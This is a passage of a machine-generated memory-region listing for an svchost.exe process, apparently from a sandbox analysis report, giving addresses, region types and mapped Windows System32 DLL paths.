0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1282 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1283 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 1284 start_va = 0x4a00000 end_va = 0x4a06fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 1285 start_va = 0x4a20000 end_va = 0x4a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 1286 start_va = 0x4aa0000 end_va = 0x4aa1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 1287 start_va = 0x4ac0000 end_va = 0x4ac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ac0000" filename = "" Region: id = 1288 start_va = 0x4ad0000 end_va = 0x4bcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 1289 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 1290 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 1291 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 1292 start_va = 0x5000000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 1293 start_va = 0x5080000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1294 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 1295 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 1296 start_va = 0x5400000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 1297 start_va = 0x5500000 end_va = 0x557ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 1298 start_va = 0x5590000 end_va = 0x5596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005590000" filename = "" Region: id = 1299 start_va = 0x55a0000 end_va = 0x561ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055a0000" filename = "" Region: id = 1300 start_va = 0x5620000 end_va = 0x5624fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1301 start_va = 0x5630000 end_va = 0x563ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1302 start_va = 0x5650000 end_va = 0x5656fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005650000" filename = "" Region: id = 1303 start_va = 0x5660000 end_va = 0x575ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005660000" filename = "" Region: id = 1304 start_va = 0x5760000 end_va = 0x585ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005760000" filename = "" Region: id = 1305 start_va = 0x5860000 end_va = 0x58dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005860000" filename = "" Region: id = 1306 start_va = 0x5900000 end_va = 0x59fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 1307 start_va = 0x5a00000 end_va = 0x5a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 1308 start_va = 0x5a80000 end_va = 0x5b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a80000" filename = "" Region: id = 1309 start_va = 0x5b80000 end_va = 0x5c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 1310 start_va = 0x5c80000 end_va = 0x5cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 1311 start_va = 0x5d00000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 1312 start_va = 0x5e00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 1313 start_va = 0x5f00000 end_va = 0x5ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 1314 start_va = 0x6090000 end_va = 0x6096fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006090000" filename = "" Region: id = 1315 start_va = 0x6100000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 1316 start_va = 0x6200000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 1317 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 1318 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 1319 start_va = 0x6600000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 1320 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 1321 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 1322 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 1323 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 1324 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 1325 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 1326 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 1327 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 1328 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 1329 start_va = 0x7310000 end_va = 0x740ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 1330 start_va = 0x7500000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 1331 start_va = 0x7600000 end_va = 0x76fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007600000" filename = "" Region: id = 1332 start_va = 0x7810000 end_va = 0x790ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007810000" filename = "" Region: id = 1333 start_va = 0x7910000 end_va = 0x7a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007910000" filename = "" Region: id = 1334 start_va = 0x7a10000 end_va = 0x7b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a10000" filename = "" Region: id = 1335 start_va = 0x7d10000 end_va = 0x7e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d10000" filename = "" Region: id = 1336 start_va = 0x8000000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 1337 start_va = 0x8100000 end_va = 0x81fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Region: id = 1338 start_va = 0x8200000 end_va = 0x82fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008200000" filename = "" Region: id = 1339 start_va = 0x8510000 end_va = 0x860ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008510000" filename = "" Region: id = 1340 start_va = 0x8610000 end_va = 0x870ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008610000" filename = "" Region: id = 1341 start_va = 0x8710000 end_va = 0x880ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008710000" filename = "" Region: id = 1342 start_va = 0xa010000 end_va = 0xa10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a010000" filename = "" Region: id = 1343 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1344 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1345 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1346 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1347 start_va = 0x7ff661bf0000 end_va = 0x7ff661bfcfff monitored = 0 entry_point = 0x7ff661bf3980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1348 start_va = 0x7ffd33f50000 end_va = 0x7ffd33f61fff monitored = 0 entry_point = 0x7ffd33f51a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1349 start_va = 0x7ffd34af0000 end_va = 0x7ffd34b33fff monitored = 0 entry_point = 0x7ffd34b183e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 1350 start_va = 0x7ffd34d00000 end_va = 0x7ffd34faffff monitored = 0 entry_point = 0x7ffd34d01cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1351 start_va = 0x7ffd34fb0000 end_va = 0x7ffd3500cfff monitored = 0 entry_point = 0x7ffd34fde510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 1352 start_va = 0x7ffd35670000 end_va = 0x7ffd35677fff monitored = 0 entry_point = 0x7ffd356713b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 1353 start_va = 0x7ffd35d10000 end_va = 0x7ffd35d41fff monitored = 0 entry_point = 0x7ffd35d1b0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1354 start_va = 0x7ffd36020000 end_va = 0x7ffd36065fff monitored = 0 entry_point = 0x7ffd360279a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 1355 start_va = 0x7ffd36070000 end_va = 0x7ffd360aefff monitored = 0 entry_point = 0x7ffd360982d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1356 start_va = 0x7ffd36120000 end_va = 0x7ffd36130fff monitored = 0 entry_point = 0x7ffd361228d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 1357 start_va = 0x7ffd361d0000 end_va = 0x7ffd36236fff monitored = 0 entry_point = 0x7ffd361db160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1358 start_va = 0x7ffd36240000 end_va = 0x7ffd36253fff monitored = 0 entry_point = 0x7ffd36242a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1359 start_va = 0x7ffd368d0000 end_va = 0x7ffd369defff monitored = 0 entry_point = 0x7ffd3690c010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 1360 start_va = 0x7ffd38070000 end_va = 0x7ffd3808cfff monitored = 0 entry_point = 0x7ffd38074f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1361 start_va = 0x7ffd385c0000 end_va = 0x7ffd386dcfff monitored = 0 entry_point = 0x7ffd385efe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1362 start_va = 0x7ffd3af10000 end_va = 0x7ffd3af45fff monitored = 0 entry_point = 0x7ffd3af127f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 1363 start_va = 0x7ffd3c980000 end_va = 0x7ffd3c990fff monitored = 0 entry_point = 0x7ffd3c987480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 1364 start_va = 0x7ffd3c9a0000 end_va = 0x7ffd3ca23fff monitored = 0 entry_point = 0x7ffd3c9b8d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1365 start_va = 0x7ffd3ca30000 end_va = 0x7ffd3ca45fff monitored = 0 entry_point = 0x7ffd3ca31af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1366 start_va = 0x7ffd3ca50000 end_va = 0x7ffd3ca69fff monitored = 0 entry_point = 0x7ffd3ca52330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1367 start_va = 0x7ffd3ca70000 end_va = 0x7ffd3ca7cfff monitored = 0 entry_point = 0x7ffd3ca71420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1368 start_va = 0x7ffd3cb30000 end_va = 0x7ffd3cb45fff monitored = 0 entry_point = 0x7ffd3cb355e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1369 start_va = 0x7ffd3cb50000 end_va = 0x7ffd3cc25fff monitored = 0 entry_point = 0x7ffd3cb7a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1370 start_va = 0x7ffd3cc30000 end_va = 0x7ffd3cc93fff monitored = 0 entry_point = 0x7ffd3cc4bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1371 start_va = 0x7ffd3cca0000 end_va = 0x7ffd3ccc4fff monitored = 0 entry_point = 0x7ffd3cca9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1372 start_va = 0x7ffd3ccd0000 end_va = 0x7ffd3cdc5fff monitored = 0 entry_point = 0x7ffd3cd09590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1373 start_va = 0x7ffd3cdd0000 end_va = 0x7ffd3cf06fff monitored = 0 entry_point = 0x7ffd3ce10480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1374 start_va = 0x7ffd3cf30000 end_va = 0x7ffd3cf3efff monitored = 0 entry_point = 0x7ffd3cf34960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1375 start_va = 0x7ffd3d070000 end_va = 0x7ffd3d080fff monitored = 0 entry_point = 0x7ffd3d072fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1376 start_va = 0x7ffd3d090000 end_va = 0x7ffd3d0adfff monitored = 0 entry_point = 0x7ffd3d093a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1377 start_va = 0x7ffd3d0b0000 end_va = 0x7ffd3d131fff monitored = 0 entry_point = 0x7ffd3d0b2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1378 start_va = 0x7ffd3d150000 end_va = 0x7ffd3d163fff monitored = 0 entry_point = 0x7ffd3d151800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1379 start_va = 0x7ffd3d170000 end_va = 0x7ffd3d1e3fff monitored = 0 entry_point = 0x7ffd3d185eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1380 start_va = 0x7ffd3dce0000 end_va = 0x7ffd3dcf7fff monitored = 0 entry_point = 0x7ffd3dce1b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 1381 start_va = 0x7ffd3dd00000 end_va = 0x7ffd3dd3ffff monitored = 0 entry_point = 0x7ffd3dd0cbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 1382 start_va = 0x7ffd3dd40000 end_va = 0x7ffd3dd86fff monitored = 0 entry_point = 0x7ffd3dd41d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 1383 start_va = 0x7ffd3dd90000 end_va = 0x7ffd3ddd1fff monitored = 0 entry_point = 0x7ffd3dd93670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1384 start_va = 0x7ffd3de00000 end_va = 0x7ffd3de17fff monitored = 0 entry_point = 0x7ffd3de0b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 1385 start_va = 0x7ffd3e040000 end_va = 0x7ffd3e05efff monitored = 0 entry_point = 0x7ffd3e0437e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 1386 start_va = 0x7ffd3e060000 end_va = 0x7ffd3e0d8fff monitored = 0 entry_point = 0x7ffd3e0676a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 1387 start_va = 0x7ffd3e330000 end_va = 0x7ffd3e347fff monitored = 0 entry_point = 0x7ffd3e334e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 1388 start_va = 0x7ffd3e350000 end_va = 0x7ffd3e374fff monitored = 0 entry_point = 0x7ffd3e355ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 1389 start_va = 0x7ffd3e380000 end_va = 0x7ffd3e422fff monitored = 0 entry_point = 0x7ffd3e382c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1390 start_va = 0x7ffd3e430000 end_va = 0x7ffd3e481fff monitored = 0 entry_point = 0x7ffd3e435770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1391 start_va = 0x7ffd3e490000 end_va = 0x7ffd3e4bdfff monitored = 1 entry_point = 0x7ffd3e492300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 1392 start_va = 0x7ffd3e4c0000 end_va = 0x7ffd3e51dfff monitored = 0 entry_point = 0x7ffd3e4c5080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 1393 start_va = 0x7ffd3e520000 end_va = 0x7ffd3e53ffff monitored = 0 entry_point = 0x7ffd3e521f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 1394 start_va = 0x7ffd3e540000 end_va = 0x7ffd3e548fff monitored = 0 entry_point = 0x7ffd3e5418f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 1395 start_va = 0x7ffd3e550000 end_va = 0x7ffd3e560fff monitored = 0 entry_point = 0x7ffd3e551d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1396 start_va = 0x7ffd3e570000 end_va = 0x7ffd3e5b0fff monitored = 0 entry_point = 0x7ffd3e573750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1397 start_va = 0x7ffd3e5c0000 end_va = 0x7ffd3e6b2fff monitored = 0 entry_point = 0x7ffd3e5e5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1398 start_va = 0x7ffd3e700000 end_va = 0x7ffd3e74bfff monitored = 0 entry_point = 0x7ffd3e715310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1399 start_va = 0x7ffd3e990000 end_va = 0x7ffd3e9a3fff monitored = 0 entry_point = 0x7ffd3e993710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1400 start_va = 0x7ffd3e9b0000 end_va = 0x7ffd3e9d7fff monitored = 0 entry_point = 0x7ffd3e9befc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 1401 start_va = 0x7ffd3ea40000 end_va = 0x7ffd3ea5dfff monitored = 0 entry_point = 0x7ffd3ea4ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1402 start_va = 0x7ffd3ea60000 end_va = 0x7ffd3ea77fff monitored = 0 entry_point = 0x7ffd3ea62000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1403 start_va = 0x7ffd3ea80000 end_va = 0x7ffd3ec01fff monitored = 0 entry_point = 0x7ffd3ea982a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1404 start_va = 0x7ffd3ec90000 end_va = 0x7ffd3ed0efff monitored = 0 entry_point = 0x7ffd3eca7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1405 start_va = 0x7ffd3ed10000 end_va = 0x7ffd3ed4bfff monitored = 0 entry_point = 0x7ffd3ed16aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1406 start_va = 0x7ffd3ed50000 end_va = 0x7ffd3ed5bfff monitored = 0 entry_point = 0x7ffd3ed535c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1407 start_va = 0x7ffd402d0000 end_va = 0x7ffd40304fff monitored = 0 entry_point = 0x7ffd402da270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 1408 start_va = 0x7ffd40310000 end_va = 0x7ffd4038ffff monitored = 0 entry_point = 0x7ffd4033d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1409 start_va = 0x7ffd403c0000 end_va = 0x7ffd403fffff monitored = 0 entry_point = 0x7ffd403d6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1410 start_va = 0x7ffd40b80000 end_va = 0x7ffd40ba1fff monitored = 0 entry_point = 0x7ffd40b92540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1411 start_va = 0x7ffd40bb0000 end_va = 0x7ffd40c84fff monitored = 0 entry_point = 0x7ffd40bccf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1412 start_va = 0x7ffd40d50000 end_va = 0x7ffd40d58fff monitored = 0 entry_point = 0x7ffd40d521d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 1413 start_va = 0x7ffd410e0000 end_va = 0x7ffd410f5fff monitored = 0 entry_point = 0x7ffd410e1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1414 start_va = 0x7ffd41d70000 end_va = 0x7ffd41d79fff monitored = 0 entry_point = 0x7ffd41d71350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1415 start_va = 0x7ffd422e0000 end_va = 0x7ffd422f1fff monitored = 0 entry_point = 0x7ffd422e3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1416 start_va = 0x7ffd44840000 end_va = 0x7ffd4485afff monitored = 0 entry_point = 0x7ffd44841040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1417 start_va = 0x7ffd44af0000 end_va = 0x7ffd44af9fff monitored = 0 entry_point = 0x7ffd44af14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" 